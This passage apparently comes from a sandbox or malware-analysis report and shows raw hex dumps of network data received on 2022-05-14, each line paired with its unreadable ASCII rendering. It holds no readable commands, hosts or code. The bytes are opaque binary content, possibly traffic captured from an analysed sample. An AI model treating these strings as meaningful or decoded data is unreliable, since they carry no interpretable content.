67 35 10 d3 59 9e ef 8e c6 f9 ff cf f8 be aa 38 99 3d f5 e5 6d 83 32 64 b1 5a d5 ab 87 1f 1a fc 1c e7 96 6c 4e aa 4b a5 f4 82 03 49 b6 0c c9 65 ac 3d be 8a 0c 79 ec 52 8d 4a 4d
                                                      Data Ascii: p<!/Hx)5y%!;A}&,%M:xV_4U'2;GxAVY:rQ-V@bU,\A:5j|,&\POC}/SiJZmUh}4+m2-@Xo'@K^X^y`g5Y8=m2dZlNKIe=yRJM
                                                      2022-05-14 13:17:17 UTC890INData Raw: 03 4f 11 ab 47 d8 8e 4b 93 4a 91 5e fc b1 fb 9b 6d 45 c7 4f 80 32 7e f0 06 ce 5c 9d fd bf e6 39 5d a6 6a 24 63 dc f7 46 a3 88 46 f3 05 ff e9 0b 12 2b ae 2f 7b d0 c5 39 48 00 d9 ae e4 55 03 4a f0 d0 4c 10 77 8e 98 1a c3 8d 7e 5c be 81 51 ef b7 24 4b 47 02 49 a9 f3 c5 ce d8 db 38 d7 ca 02 c8 87 af ca 25 0d 19 ad 89 db b7 0b 59 34 cb c4 6d d8 05 a1 60 20 cd 2b 90 af b6 60 b6 cc bc fa 2a 12 81 44 7b 56 d4 b0 92 5b f9 ae 13 5b f4 4a a6 16 21 1b 42 ff 61 a0 68 79 62 c2 6b 66 38 4e bf ad b8 96 02 14 6b f7 66 df 6f 56 47 61 80 74 d8 34 67 7b 94 41 01 58 8d 67 c6 b6 ba 57 c4 f3 c8 fc 60 94 19 64 a4 eb ee 93 88 95 fd 06 2c 6a 3f 44 0f 40 b1 a4 b9 99 5b 87 c3 e4 1b 63 5d 67 1f d5 cc 62 cd 31 a2 69 86 af 27 f6 07 a4 77 3b bf 84 73 30 4d fc 34 69 f6 cd 9c e3 7a fc f4
                                                      Data Ascii: OGKJ^mEO2~\9]j$cFF+/{9HUJLw~\Q$KGI8%Y4m` +`*D{V[[J!Bahybkf8NkfoVGat4g{AXgW`d,j?D@[c]gb1i'w;s0M4iz
                                                      2022-05-14 13:17:17 UTC894INData Raw: 68 e8 7b e4 e9 45 4c f8 6d a4 aa 0f 49 ee bb 76 81 b0 0f f0 b0 0b 92 6a 1c cd 62 dc 0d 3c 8a ca ae a7 1c 38 e0 96 dd 57 25 6b 57 de 36 63 f2 a5 45 84 ea 1c 64 91 ac 48 3d b4 c1 b7 4f 2f fa 52 00 d7 cf 9c ad c5 07 02 30 5b 78 ee 4d 6a 86 dc 08 d8 28 84 dd 6a e9 38 56 1c a8 61 9b cc b0 03 62 7c 0a 37 49 06 36 2e 64 0e 0b d3 8a 75 e4 6d 3b 7a eb b6 05 77 c7 af 62 78 24 50 2a 2c fe 01 c7 65 f7 71 46 9f 04 1d 4a 4d 95 0e 96 84 c7 1d 9b c3 1b 92 49 04 e9 06 99 7f 3e bc 6b 8a 17 e4 3f 36 74 96 06 34 91 a7 4e 32 88 3b ae e5 c8 97 c1 d9 fd 5e cf cf e1 b5 5d ea c4 83 7b 84 cb 07 dc 6a bc 3c c1 70 63 c5 fb 2b 39 e5 76 74 13 a6 16 b4 34 4b 54 3d 95 58 af 7c ad 6a 0e a7 c2 49 54 5b 8b fe fa 3b 82 1b aa ce 02 b9 db 27 9f 03 e7 83 b3 e7 cf a3 93 52 a2 88 39 ee 02 e5 2a
                                                      Data Ascii: h{ELmIvjb<8W%kW6cEdH=O/R0[xMj(j8Vab|7I6.dum;zwbx$P*,eqFJMI>k?6t4N2;^]{j<pc+9vt4KT=X|jIT[;'R9*
                                                      2022-05-14 13:17:17 UTC898INData Raw: d6 a2 35 d0 58 98 be 5d b9 f5 de 5d 84 68 32 93 73 35 13 7b 57 f2 e7 d8 5a 50 f8 72 3e 0c ae c8 07 96 f4 0d 34 a2 f9 76 d8 ef c8 bc 20 04 ee 0c 8b c0 99 f6 bf 0e 12 20 4f 2b a2 9b 0b 32 98 af eb d3 c8 00 33 c8 0f e1 3f 5d 83 6f 33 15 27 dd cb 58 ea 7f bc 93 25 a6 69 13 5c 65 e8 97 1a ac e3 e1 1c 63 88 26 ac b8 9f 0a 85 be 9a fb ed 39 3f 58 2c d0 26 86 53 ba 29 1c a6 51 40 99 21 a0 70 ff 9d d6 78 04 37 e9 39 f0 8b 8e 34 6f 16 ad 58 37 a5 e1 44 fb 30 e0 00 eb 05 54 b4 d7 ac 0c ac 40 a9 14 44 c6 2f e8 f2 61 b3 05 af 27 cd 76 2f 2f 9a da c8 04 f6 e2 a9 69 59 96 d1 19 5b 83 c1 1a d0 c9 43 6b 14 79 48 13 e5 04 4b 0d 29 be a4 8c 53 89 13 6e 02 95 c5 1c ad ae c6 7f d6 72 86 1a b5 9f fe 14 0b 43 63 7a f0 c0 14 19 0e 90 15 f4 53 f9 13 97 30 a3 3d d1 23 f1 c9 22 10
                                                      Data Ascii: 5X]]h2s5{WZPr>4v O+23?]o3'X%i\ec&9?X,&S)Q@!px794oX7D0T@D/a'v//iY[CkyHK)SnrCczS0=#"
                                                      2022-05-14 13:17:17 UTC902INData Raw: 89 0a 19 5c 9c 67 ae 39 7f 17 a4 ca 09 16 e6 42 cf 5e 52 3a 52 de 44 eb 88 42 68 c3 32 c1 18 b5 02 ae 87 da 49 78 cb 6d 09 dd d3 d9 1a fb 42 e7 1d d6 9f 16 2f 4c b4 f1 e8 4c 50 71 88 47 ed 41 8e 60 c2 f7 44 66 f3 4f 3e ec 72 e0 c7 02 7d 0c 4b 1e 92 b0 e6 f7 26 6c af b7 f4 61 dd 83 1f 60 34 29 e6 b0 bc 9f 67 40 66 46 a0 2c 63 f9 d0 33 82 2a da 95 77 99 b6 32 3e de 7e f3 e6 87 dc ad 9e 13 89 84 ac 50 be 09 df 9a db b8 ac 9a c3 8e 68 be 5c b4 c7 e9 5e 11 56 15 9c cb 49 60 2b 3c 5b 28 a3 2c ba 44 5b d7 7f 20 fc 70 33 f4 18 66 11 d3 5c cc 86 12 36 34 50 5e 22 c5 73 b7 b3 0f f3 a4 f1 6b d0 39 99 3e 6f 70 c2 2b d0 01 29 c5 de b8 a6 b5 28 a9 07 a1 23 a3 44 4d 11 a2 27 e9 11 6a c3 08 d1 99 c2 1c 58 f3 03 13 d8 ba 5a 35 d2 8b 3e 7a 65 6e 63 63 75 ce a8 c2 54 4a a4
                                                      Data Ascii: \g9B^R:RDBh2IxmB/LLPqGA`DfO>r}K&la`4)g@fF,c3*w2>~Ph\^VI`+<[(,D[ p3f\64P^"sk9>op+)(#DM'jXZ5>zenccuTJ
                                                      2022-05-14 13:17:17 UTC907INData Raw: 7d f9 aa 58 c5 13 54 8d 20 e1 b8 db ce 14 fd 2e 45 4c b7 24 bd a2 57 bd b6 0c 47 a0 40 d1 7f 2b 45 26 c3 b1 7f d5 dc 7f e1 4b 7b 21 6a 9d 45 a4 65 19 68 38 38 0d 93 24 75 6a 9b b8 24 a9 5d 04 7c f7 05 46 9e 09 03 f1 fa 49 f1 4d fe ca af 3d bb 83 73 ac ba a0 d8 31 4c 67 dc 69 e3 38 6a 6b 4b 1d 01 80 8e f4 7a 70 66 27 32 68 5f 66 61 ed 38 0e 9f 0d df 0f 01 f6 70 4c 1f 4d 26 59 77 96 4d f7 d3 3a f6 c8 65 0a c4 54 0c 8e c6 89 f1 67 e1 c8 03 c4 18 8d ef 6c a3 85 97 14 06 38 be c3 73 20 32 3b 99 b1 00 b0 de 2b 5c 50 dd 0b f5 ed 7c 74 8e 91 6d 56 ba c6 ad e7 5c 7a 3c cd 3b 5a 6f 71 5c c0 d6 b7 ef b1 50 81 00 e6 56 5c b1 7a 2d 67 c4 2f 74 c6 ce ef be 98 d9 f7 4b 5b e9 c8 b8 cf f5 4c cf a6 a2 b7 5b ef 63 60 ea 42 c3 bf f4 3b b5 c5 0e f9 c6 cc d7 82 c0 8e d1 a9 3c
                                                      Data Ascii: }XT .EL$WG@+E&K{!jEeh88$uj$]|FIM=s1Lgi8jkKzpf'2h_fa8pLM&YwM:eTgl8s 2;+\P|tmV\z<;Zoq\PV\z-g/tK[L[c`B;<
                                                      2022-05-14 13:17:17 UTC911INData Raw: 05 cc cb 97 40 ab 55 1d e0 9d 54 19 92 f5 92 d0 c0 c0 18 e2 de b0 7e 6b 86 f3 67 c8 bf cc f0 bf d9 ab 2c c5 ad 6f b5 6f e6 81 75 26 f6 59 32 bf 25 33 f1 87 63 cb 82 03 b1 bf 00 fa 74 ab cc ce 0b f3 2a 26 38 57 d0 98 cf 55 f7 fa c9 21 0f f9 d6 0f aa 84 70 35 cd 88 9d cc ed 82 b3 32 9d b4 d4 7d 4d 2b 8f 69 9f 1b 47 e7 a6 c8 98 58 4a 14 49 15 ba 4b c4 2a 25 b3 25 15 0c f1 47 b7 c0 57 af 66 b6 9d 1c b6 30 14 15 35 34 0c 18 ec e6 b9 d1 2c 8e 30 6f d7 1d 05 d0 2e 59 a2 bd 0e b7 de 44 52 d4 0b 2d 0a 7a 57 29 30 7d 95 86 3c 83 1c bd b3 e3 dc 9a de 28 b0 bf 5d a7 ad 55 6d 3f c4 52 9e 7b 76 22 4b 8f 46 70 7a 28 ac 0e 74 aa eb b9 0c 8a c6 cf 6a 3f a3 a7 d5 b9 28 44 9a c3 d7 05 84 f6 e3 90 f6 b1 5f 1c 6f 7b d9 cb ec b7 42 92 a5 04 3f 3c 8d 8b 4e d5 f7 2b 41 fd 16 8d
                                                      Data Ascii: @UT~kg,oou&Y2%3ct*&8WU!p52}M+iGXJIK*%%GWf054,0o.YDR-zW)0}<(]Um?R{v"KFpz(tj?(D_o{B?<N+A
                                                      2022-05-14 13:17:17 UTC915INData Raw: fa 2a cb 1f 37 c5 a1 cc 9f 1d c4 e6 a8 d3 24 16 76 e0 eb be 14 96 66 86 3d f1 ab 3c fe 05 3a 58 3a 8f b7 07 f4 66 30 9f a9 f5 ac 40 3e 59 b7 e4 97 91 5c 54 b1 cb 33 71 4b d7 a8 49 2d f2 e7 56 a4 94 43 9b 8e 8e e9 61 3c 69 2c e6 a4 81 49 be 76 78 c2 dc fd 4b cb b0 75 24 86 b4 15 5b b8 bd 74 f9 3d 22 94 07 7c ea 47 32 29 9e 64 49 73 bc 5f 94 fb c1 3e 21 e8 e2 a7 f3 d6 95 12 fe bb 05 de 27 2d a8 7f 5c 12 6d d6 dd 19 bd 70 58 9e c0 5f 35 5b 5f 53 8e 04 f1 fc 96 71 e1 67 f9 56 02 9a a9 e9 de ce 13 84 5f 79 c9 13 85 d0 50 09 57 13 6d 1f 71 b3 1b 79 5b 80 a4 9d 7f 81 70 f8 c5 f9 4f 51 66 ea 0d f3 48 99 8e 06 df 2e 07 a5 6e b3 0f eb ef fb 69 53 06 b4 f8 57 3e 55 16 85 54 49 0d 98 0a fc 1e 1a 75 0e ae 18 c4 77 3b 6a c5 92 b2 bb 91 be a5 13 23 47 e2 9a 5e e7 d2 b2
                                                      Data Ascii: *7$vf=<:X:f0@>Y\T3qKI-VCa<i,IvxKu$[t="|G2)dIs_>!'-\mpX_5[_SqgV_yPWmqy[pOQfH.niSW>UTIuw;j#G^
                                                      2022-05-14 13:17:17 UTC918INData Raw: 90 2f 3c e7 9d d5 28 d9 f4 c9 26 17 df 6c b7 5a 9f 33 17 9b 9f 30 c2 85 b6 49 8c d2 e8 f3 e5 02 05 87 82 e1 b0 6e b0 08 30 48 b1 b9 a1 06 47 09 b5 09 93 ce 8a a2 63 90 5f 12 7f d3 57 42 6a 06 a8 4c 5b 38 cd ed d5 f9 57 b0 b9 6b 87 4e c2 7a 6f aa fb a0 39 a4 f4 3b 5e fa 80 b7 61 53 2d cd 97 fe c3 d2 ae c7 d8 ff 7c 2c 6a d5 66 a4 1e 21 e0 2a b7 4d 7b 51 5e 81 53 c9 6b 37 6c f6 25 81 e0 b2 32 fb 49 08 84 d5 47 d9 b7 e3 50 4b e9 1e 63 23 dc 27 ea cc 7e a9 d0 74 25 0b b0 69 aa cb 45 5c d4 43 52 53 d6 2a e9 c6 df 2e a8 b7 b2 3a 94 0f f0 5a 46 69 49 6e d2 8b fc bf d7 a2 b7 d5 24 3f 2e 1b 79 e6 32 83 48 52 80 10 1e 53 01 9d 5e 94 99 b1 c2 51 a4 e4 67 26 c9 0c 02 58 43 90 0a 5d fd f8 96 b5 d7 9b 1b 9e b1 21 b3 62 b2 f2 1b 8d 27 47 71 20 c8 27 40 bc 64 54 2e ed cb
                                                      Data Ascii: /<(&lZ30In0HGc_WBjL[8WkNzo9;^aS-|,jf!*M{Q^Sk7l%2IGPKc#'~t%iE\CRS*.:ZFiIn$?.y2HRS^Qg&XC]!b'Gq '@dT.
                                                      2022-05-14 13:17:17 UTC922INData Raw: 3a d5 77 af b2 57 5e 2a c4 c4 e2 27 bd ca 00 f6 79 6c 4d 6e 0d 10 77 1c 1c b6 61 2b 0c d3 5f 7b 23 61 94 8d 20 e8 c8 ef 39 75 5f f0 3a dc 5f 8e 09 7a 9a b1 69 a5 15 37 91 f3 0d e4 fb e8 41 8b ec 0e 83 1b e5 3d 8a d6 32 9c b3 12 88 93 dd f2 f4 73 22 5d 1c 90 bc ac 0f bd 0d e0 a4 df 26 36 2d 7f f4 90 5a 6d 7e 6f 0f c5 0b b8 dc 76 0d 07 51 d3 f8 25 29 14 03 ab 19 ba d4 67 51 4f 57 7c a9 6e 41 c5 1f 5b 41 0a 6f 21 a0 0c 18 54 3b c6 29 7d bc ce 06 da 76 a8 c2 36 1a bb 37 bb 65 49 73 9d 2e 10 83 5e c9 3a 2b 8b bf 93 32 97 e3 99 a0 0b 32 4e b8 e7 32 55 37 2b ee 0b c4 0d 9a 30 63 d3 1f 61 ef c5 83 5f 41 35 d1 db 84 ab 55 ca 60 7c 56 b6 6a 26 26 23 ef cf 72 87 b4 37 f1 c9 c6 cc 81 9b b0 a5 af 3d 49 31 e7 30 5f 64 3a 12 82 83 9d 6f af 90 38 dc af 1e 92 40 4b 66 6e
                                                      Data Ascii: :wW^*'ylMnwa+_{#a 9u_:_zi7A=2s"]&6-Zm~ovQ%)gQOW|nA[Ao!T;)}v67eIs.^:+22N2U7+0ca_A5U`|Vj&&#r7=I10_d:o8@Kfn
                                                      2022-05-14 13:17:17 UTC926INData Raw: ff f7 53 12 2e 46 fd 1f 60 18 d4 38 fb a9 73 36 55 cb f2 29 47 57 87 20 6c 54 4a f6 5d 0e f4 2e bf 8e 17 01 84 2a 9a 5e a8 c8 70 ae be 03 45 cc a9 a6 b5 ad 38 c6 eb e8 74 25 e1 28 5a 00 99 5a e6 8c 2d 31 cf 15 9f 8d 55 34 d4 19 5d 8a cf 5f a2 61 bf c1 71 90 02 6b 1c 95 4f 45 45 d1 3d e0 b2 20 bd f5 e5 c4 6c 52 fd 71 38 0b 4f a8 69 cb 5a 6e 9c a7 e1 b3 17 77 1f 1b df 7c 49 bb f4 6a 73 6c 38 93 9d be ec 7c d5 82 7e 51 49 f4 55 1e d8 15 62 60 72 6d cc 2d 16 be 33 2e e1 71 40 24 b1 1c 70 a4 7a a4 5b fc 0d 0b 2b 81 ba e5 2f 6f b0 ac bf b3 a2 b1 fb 7d 95 be 1c ce ab d5 ad e0 b7 c1 88 f4 f7 17 f8 b4 cb 52 98 6c d0 3d 41 45 47 a6 e9 37 e5 c1 91 f4 bd b8 a6 e2 ff a1 be 74 2a a6 08 b7 3f e9 13 68 f3 2c f8 ac cd 66 af dd e1 ef a3 07 3f ac 0c 4c a5 4e d2 01 57 07 55
                                                      Data Ascii: S.F`8s6U)GW lTJ].*^pE8t%(ZZ-1U4]_aqkOEE= lRq8OiZnw|Ijsl8|~QIUb`rm-3.q@$pz[+/o}Rl=AEG7t*?h,f?LNWU
                                                      2022-05-14 13:17:17 UTC930INData Raw: dc 07 81 f8 f3 27 37 ae 5b ee 9b 6e a4 b3 be 21 0f e5 c7 c4 05 8f 1a 43 28 be 03 68 be c5 7d e3 f7 86 48 3b 12 5d dc 71 ac a7 17 5e 22 b3 9e a6 06 92 46 1f 9b 58 ad bb ce ad 24 77 d7 1b 2f 67 08 22 92 cb f2 5b 29 c4 a7 98 d1 ab c5 8b b1 f2 3c 7b fc 3e 51 ed ab ee 72 2b 11 d6 79 aa 61 c1 16 4c bb 6f 34 97 f1 87 6c bd 1a 6e b6 4d e4 8f 75 28 c5 03 83 0b 30 2d 75 88 3c 0e ae 86 52 e2 73 22 80 12 94 83 31 80 1f c2 00 c8 ac 53 c1 6d 57 b3 78 2a 6d 32 b3 6d 71 97 49 4b b5 4a 01 02 02 45 00 b6 3d 5a 97 51 79 f5 48 51 08 ee 27 a6 68 98 92 23 0b ae 83 00 30 62 ba fa 58 90 c2 79 92 e3 d0 4c 04 e8 38 1b 48 df 37 b0 4c 57 77 66 43 ae 4f 0c e6 17 43 ec 62 0d af 31 a2 6a be 4c 0b b2 35 e3 54 1f 68 78 0a d1 78 b3 02 4d d4 86 d6 5f 81 45 ff a2 da 6b 6d d4 e0 d2 bf 7d 43
                                                      Data Ascii: '7[n!C(h}H;]q^"FX$w/g"[)<{>Qr+yaLo4lnMu(0-u<Rs"1SmWx*m2mqIKJE=ZQyHQ'h#0bXyL8H7LWwfCOCb1jL5ThxxM_Ekm}C
                                                      2022-05-14 13:17:17 UTC934INData Raw: 21 3e b5 81 16 8f 76 f2 e9 65 8e 38 3c 56 d5 80 a1 c0 ac 92 96 a8 77 7f 41 e8 7d f9 f4 c4 7c 68 a1 bb 51 ab 2c cd 62 59 c4 75 31 b7 00 e1 a7 21 f1 ac 3e 7d a0 1d f1 6e 40 0d 78 ec 41 5b 87 78 3e 32 db 91 27 69 43 c1 56 f7 60 4b c5 74 51 42 aa 60 db 43 2e 90 4a e5 75 05 89 fa 08 2f 0e 2b f0 a9 7c 72 3c 6c bc f3 5c db 90 71 cc 01 72 c2 09 0f 83 80 52 10 6b c1 ba c0 6c bf 79 c2 ee 28 19 b6 59 25 59 1b 67 c0 56 61 a4 99 f0 d0 39 dc fa fd 8e 34 e6 be 34 3a 91 cc 5c 98 bb 58 7d c4 a9 22 e7 61 fc cc e8 ef 68 f0 c1 4d c9 23 3b 9e 58 b7 f6 48 af 20 40 f5 2f 37 bd e4 a3 a5 cc 33 a1 b6 e9 60 02 a2 bd 29 a2 4b 77 9b 69 e2 16 2a a1 e0 4d 30 0c 8f 8c 1a 00 9d 7c 88 83 be 87 91 fe 6c cb 90 a9 2b bd 9d 6e 1f ef 72 28 01 43 3d c3 06 76 17 4b cf 85 87 81 e0 b5 ed 9c e7 7b
                                                      Data Ascii: !>ve8<VwA}|hQ,bYu1!>}n@xA[x>2'iCV`KtQB`C.Ju/+|r<l\qrRkly(Y%YgVa944:\X}"ahM#;XH @/73`)Kwi*M0|l+nr(C=vK{
                                                      2022-05-14 13:17:17 UTC939INData Raw: 1e 68 03 a4 39 0d 9c 46 46 e3 cf 59 e8 e2 b2 e9 fe 2b b7 6e 3e 42 55 4b 19 70 4b 3c 37 c2 52 10 b4 33 e2 e1 12 ce 03 f8 2f cd 61 77 64 93 1b b1 11 d7 83 2e e4 e5 3a 41 61 01 00 ae c2 d3 36 59 5c 66 aa 76 7c 82 cf dd ba dc b0 73 da c8 c0 49 d2 41 d3 46 4b 28 e7 38 39 eb e6 9b 35 99 a0 59 83 02 22 6d 23 0c 02 49 0d 41 ed cd 3c 5a 01 8f 62 98 d6 73 b7 69 db f8 6b 54 2c 04 5d 61 fe bd 44 10 41 2f a8 a0 f9 fc c9 f3 fc eb 6c 8a 2b 4c 35 2d f6 77 7b 28 84 ad ed 2d 46 3b e0 21 bd 48 e0 8b cc 38 ce 60 1e b6 4f 4e 8e db 26 c6 3c 91 d4 0f 99 d5 8a cc c5 84 74 82 99 b6 3a 22 52 72 9b e3 dd 20 eb 62 2c da 62 12 fa 48 d8 58 4f 94 bb 48 93 95 14 c0 4e 75 e5 4b ff a9 93 89 31 98 a8 04 ca 5f eb fd a9 a2 0a bd aa 99 5e ca cb ca 23 0f 33 f9 77 26 d8 5d fb 9b f5 46 b4 1f ff
                                                      Data Ascii: h9FFY+n>BUKpK<7R3/awd.:Aa6Y\fv|sIAFK(895Y"m#IA<ZbsikT,]aDA/l+L5-w{(-F;!H8`ON&<t:"Rr b,bHXOHNuK1_^#3w&]F
                                                      2022-05-14 13:17:17 UTC943INData Raw: d6 85 2a 8b ad 7d 59 88 ee fa da a2 ae ac 6f 6c 25 d0 1d f7 de fd dd 41 38 81 b1 96 39 9b af dd 01 51 01 24 63 00 68 eb 84 34 bc 4f f4 70 49 73 21 cd 6c dd 3a f4 fe 44 f4 ba ba 78 b9 8d 78 27 b9 eb d1 29 2e d1 c9 f5 9f c2 d9 2f 42 34 86 34 7e e5 90 2e 05 4a af c5 31 9b af 45 11 fd bd 17 88 e7 13 12 0f c1 50 36 a0 04 56 2f 89 1b 63 32 6d 19 9a ca d2 cb 4f 48 cb a0 39 0e 0f d8 e0 0b ea db 68 4b be 35 14 2b 03 54 4f 27 f2 72 88 92 18 50 40 50 5f e0 db 23 1b 4d 00 fc 29 1a 3a 71 3e 03 d2 1e 34 38 e8 91 83 20 65 11 e1 7c 1f fc c1 84 50 57 ee 0b 0f b4 41 7a fe 77 3a 7b d6 ba 40 f4 36 11 53 c0 ca f5 a5 79 74 81 fb 8b f1 e8 e1 15 89 84 54 cb 48 0c 35 40 27 47 70 59 39 70 32 d5 e3 fd 0a f6 86 8c d4 66 4c bd e7 08 ab 59 a2 2e cf 66 df 8d f2 30 bc 2f 42 57 98 77 c6
                                                      Data Ascii: *}Yol%A89Q$ch4OpIs!l:Dxx')./B44~.J1EP6V/c2mOH9hK5+TO'rP@P_#M):q>48 e|PWAzw:{@6SytTH5@'GpY9p2fLY.f0/BWw
                                                      2022-05-14 13:17:17 UTC947INData Raw: 62 2e 99 cb a2 52 12 f5 1f 63 ad 24 3f 57 82 27 f3 a2 28 01 c8 da 43 a1 8f d9 24 3f fc 0c a1 93 8e ab 51 ca 50 a2 0c 44 eb b1 c5 e1 8b 23 cf 4c 6a 6d c7 25 b6 6e bb 9b 5e 1d be 1b a2 43 cc 0c 8f 6b 86 e0 97 04 7b 53 dd 38 01 c9 18 43 a0 f0 dd 50 51 f9 3e a0 c3 4f 1c 0d 27 53 cf 38 ad eb e3 60 03 a9 56 78 5d 27 1b 40 77 34 9f c4 1d 64 08 11 2d 7b a7 91 53 7b 10 01 19 da 50 87 6b bd e1 db c9 7a f4 de 36 b6 7b e3 2a 2d 0e a7 d9 10 73 22 f9 21 34 e8 56 c2 3f 04 fd 44 56 63 1a 0e ba dd 45 66 59 ce 20 7d 1b 42 aa 7b 21 a7 81 2a a9 39 af c7 60 43 b0 35 23 99 33 e0 b2 45 bb eb 11 40 15 28 7b 8b 3e aa 03 de 9b 35 8b 8c 4c 1b 0b 5f ae 0b 27 61 90 61 0f 61 af 00 de b0 8b f3 2e 0c 40 b7 14 94 34 58 a1 d4 84 90 bc 54 d0 fa 61 03 29 27 03 1a 69 8e 61 4d 30 79 48 73 f1
                                                      Data Ascii: b.Rc$?W'(C$?QPD#Ljm%n^Ck{S8CPQ>O'S8`Vx]'@w4d-{S{Pkz6{*-s"!4V?DVcEfY }B{!*9`C5#3E@({>5L_'aaa.@4XTa)'iaM0yHs
                                                      2022-05-14 13:17:17 UTC950INData Raw: cd 58 99 8c 5b c6 18 b4 8e 8c 86 29 8e 3c a5 a3 5b ea e5 90 6d 21 a4 8c 25 09 cf e9 86 2c f7 d6 35 26 a0 53 90 30 f2 74 d1 07 b9 e9 b6 1d 23 15 36 b9 44 a6 a5 85 8c 49 93 38 bf 77 ee 2c 50 c9 ef 60 e5 5f 85 67 93 d8 ba d2 ba 92 b9 f1 66 3f 91 d3 ce 5d a7 ae 26 b0 f1 69 c7 37 77 6e b5 8d 49 14 58 a1 72 ed ad 22 95 a9 0c 7c 5f ab a7 fe 55 fe 89 c3 76 50 44 3f fc 7c 5b 55 5d da f6 36 c3 25 4b 58 2f ae 7e 17 b3 a5 fc 3b eb 11 39 09 4a 7f 1c 11 ca 77 8e eb 51 98 ed c1 c2 57 8c 4b 8c e0 52 93 84 c8 58 dd a5 9d ce 4f 31 f4 c1 39 64 38 21 a3 21 c9 8f 1a a0 3c 1f b5 6e 9e 78 da 3c 04 35 3d 0c 10 d9 38 4d e7 fa 7c c8 88 0d e4 b6 c8 fd 38 a2 a1 d5 bf 8b 87 96 cc 67 fe 74 67 84 2b 5b 0a a3 ca 48 82 c0 60 d5 f7 3b f1 e6 69 81 54 c7 85 e1 4f c7 41 3c a4 18 92 dc 47 89
                                                      Data Ascii: X[)<[m!%,5&S0t#6DI8w,P`_gf?]&i7wnIXr"|_UvPD?|[U]6%KX/~;9JwQWKRXO19d8!!<nx<5=8M|8gtg+[H`;iTOA<G
                                                      2022-05-14 13:17:17 UTC954INData Raw: 47 6d ad 27 79 0f 90 27 ee 98 02 2a dc dd 5d e2 be d0 61 be ab e8 01 b6 f5 ad d5 cb 9a fb 99 41 6c 12 94 f3 78 a5 50 68 7e 38 0c 60 57 b5 8c 48 a5 6a 7a da de e5 cb 34 e7 52 b6 18 1a 3a ab 2a 62 86 6f 98 88 fd 84 ae 9e 5e 3b 34 a1 00 63 3f 62 65 30 e9 89 26 9a 63 36 94 3c 31 88 71 e5 b0 99 1f 52 b1 5f 92 c3 da d9 23 9e 43 c4 cc 9e 4e 8a 97 ef 7e a3 c7 5b 78 75 2c b7 35 01 69 aa ee e1 f2 e3 9d 2e 00 aa ed 01 a9 7f 6d e6 5f 0c f2 6a 39 d6 36 1f 36 05 14 00 ce 9b 81 5f f3 be 90 3c 4e 75 d2 b3 6b 6d 70 1a 67 32 b3 d6 56 57 ab d3 7f 6c fb 16 90 80 9b 4d be 26 96 ec 9a 20 f9 67 78 40 fd f2 04 db e5 2e d0 b1 ed a5 39 d0 3b d9 b1 a7 85 65 af 85 2d 96 33 9b 19 ca ce 8d dd 7d 04 db 4d 5a cc b6 31 6b d4 05 05 e8 40 be 2c de be 3c 2e 8d cb c5 de d1 f1 2d 42 ed aa cf
                                                      Data Ascii: Gm'y'*]aAlxPh~8`WHjz4R:*bo^;4c?be0&c6<1qR_#CN~[xu,5i.m_j966_<Nukmpg2VWlM& gx@.9;e-3}MZ1k@,<.-B
                                                      2022-05-14 13:17:17 UTC958INData Raw: 8a c2 cb cd e6 af e1 b6 f5 a1 2c df 6e 6c e5 78 91 67 8b d9 f9 68 f8 bf 84 8f 13 b1 fa 26 81 c4 3d d0 0a 9d e9 e9 47 27 ae ad bd 23 01 9c 1d e8 a6 c4 7e dd df b0 88 00 af 6a 2b d0 fe 31 6f 7a a1 b2 63 35 7f b5 7d 0c ec 1a 58 49 bc b7 ea 86 da a4 21 46 cb c1 c7 1d ad 11 e5 b2 f8 d1 f1 bd e2 74 b8 23 25 a9 69 d3 16 4c c0 c5 de 05 1b ae 8f f8 da 24 27 1a a6 81 78 24 e8 41 c8 93 4b b8 c5 7c 06 0c 5c a0 42 5e 05 30 41 4f 15 41 01 c2 6f 83 97 da e9 f2 f0 26 db d9 2c 7d 54 45 0d 1b b6 8e 35 9e 45 70 7f 24 11 36 05 25 ba 9f f2 b9 c1 e0 25 40 ca 67 3e 52 5d 2a dd 7a 46 04 6e b8 9c 14 27 14 7f df c1 4c 54 3d 45 d6 a6 05 7c 12 44 da 00 ab d8 d7 57 6d ae fa 2e b9 6b 54 54 c6 9a 1d e8 56 07 61 8a d4 f1 dc c2 3c 56 c1 ed 6f 3d b6 a6 7c 8e b0 a3 0d 8a 8a e2 76 2b 40 15
                                                      Data Ascii: ,nlxgh&=G'#~j+1ozc5}XI!Ft#%iL$'x$AK|\B^0AOAo&,}TE5Ep$6%%@g>R]*zFn'LT=E|DWm.kTTVa<Vo=|v+@
                                                      2022-05-14 13:17:17 UTC962INData Raw: 24 e3 3c 20 30 36 5a c4 28 4e 8b 2b 77 50 9a 4c fb a5 c1 6d 63 df 20 ab f5 0c 41 aa e8 3b 7e c9 b7 d9 11 ff 28 12 b4 ed a0 3f b0 71 e0 e5 42 3a 5e 01 39 1d 5d 58 6c 72 6e 71 bb 1a 09 51 22 45 cf 0c f8 23 b9 92 04 5b 84 85 ff b3 48 2b eb 0d a0 94 c5 f3 c8 75 e2 44 cc 7d 8a ea c6 50 3c 50 ed 9e fe d1 05 bb c9 d0 f2 3b 8f 78 27 36 c3 3a 74 e9 bb 4c ef ff 06 6c 6b e2 54 21 19 a4 6b 67 2c 51 cf 57 08 90 2d 66 83 c9 fe 86 b8 c9 d4 8e 4c e9 a1 12 98 94 8f 32 b9 e3 24 24 19 a8 f5 dc ea 55 4a 91 0e 00 5c 58 74 88 e9 b0 4d 74 f2 9b c4 5e 93 92 22 b4 82 3b 7a f5 20 c6 e4 92 69 b8 a2 94 9f bd 9d 99 07 e1 c4 91 00 7e 85 ec 02 a9 a1 52 43 42 40 bb 67 f7 e8 a4 33 66 b9 89 73 5e 4b 42 c4 70 bf c9 9c f4 4b 1d 0a 63 8e bf cd 8a 78 23 76 ab 04 4d 3b 0d 8e 75 d3 2a 6a 43 a4
                                                      Data Ascii: $< 06Z(N+wPLmc A;~(?qB:^9]XlrnqQ"E#[H+uD}P<P;x'6:tLlkT!kg,QW-fL2$$UJ\XtMt^";z i~RCB@g3fs^KBpKcx#vM;u*jC
